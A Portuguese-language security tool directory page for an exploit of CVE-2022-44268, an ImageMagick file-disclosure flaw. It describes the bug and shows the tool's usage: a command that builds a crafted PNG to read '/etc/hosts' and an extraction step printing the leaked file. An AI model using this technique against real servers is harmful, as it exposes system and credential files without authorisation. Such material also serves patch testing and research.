Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2022-44268 — Gera arquivos PNG maliciosos para explorar a vulnerabilidade LFI do ImageMagick (CVE-2022-44268) para leitura arbitrária de arquivos, com script de extração para prova de conceito. | Kitploit
Ferramentas/GitHubGitHub/pog-frog/cve-2022-44268
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoRed Teaming
GitHubpog-frog/cve-2022-44268

cve-2022-44268

Gera arquivos PNG maliciosos para explorar a vulnerabilidade LFI do ImageMagick (CVE-2022-44268) para leitura arbitrária de arquivos, com script de extração para prova de conceito.

Ver Repositório
14há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-44268

ImageMagick é um conjunto de software multiplataforma gratuito e de código aberto para exibir, converter e editar arquivos de imagem raster e vetorial. Ele pode ler e escrever mais de 200 formatos de arquivo de imagem. O ImageMagick é licenciado sob a Apache License 2.0. Está disponível na forma de ferramentas de linha de comando, bem como uma API C e um conjunto de classes C++. Wikipedia

ImageMagick versões 7.1.0-40 e anteriores são vulneráveis a uma vulnerabilidade de Inclusão de Arquivo Local. A vulnerabilidade se deve à validação inadequada da entrada fornecida pelo usuário. Um atacante pode explorar esta vulnerabilidade enviando um arquivo PNG manipulado ao alvo. A exploração bem-sucedida desta vulnerabilidade pode permitir que um atacante leia arquivos arbitrários no sistema alvo.

Crédito aos pesquisadores que descobriram isso:

  • Bryan Gonzalez and the Ocelot Team

Crie um PNG malicioso para aproveitar o ImageMagick 7.1.0-40:

  • CVE-2022-44267: Negação de Serviço
  • CVE-2022-44268: Divulgação de Informações

Requisitos

  • Python3
  • PIL (pip install Pillow)

Uso

Criando um PNG com generate.py:

python3  generate.py -i input.png -f "/etc/hosts" -o exploit.png

     
  ______     __  _____                   ______                
 |  _ \ \   / / |  __ \                 |  ____|               
 | |_) \ \_/ /  | |__) |__   __ _ ______| |__ _ __ ___   __ _  
 |  _ < \   /   |  ___/ _ \ / _` |______|  __| '__/ _ \ / _` | 
 | |_) | | |    | |  | (_) | (_| |      | |  | | | (_) | (_| | 
 |____/  |_|    |_|   \___/ \__, |      |_|  |_|  \___/ \__, | 
                             __/ |                       __/ | 
                            |___/                       |___/  

    

   [*] ImageMagick LFI Exploit
   [*] Embedding Payload to read the target file
   [*] Exploit PNG generated: exploit.png

PoC

python3 extract.py downloaded_img.png
127.0.0.1       localhost
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

Isenção de responsabilidade: Seja bonzinho, por favor, não use para más ações.

Baixar ferramenta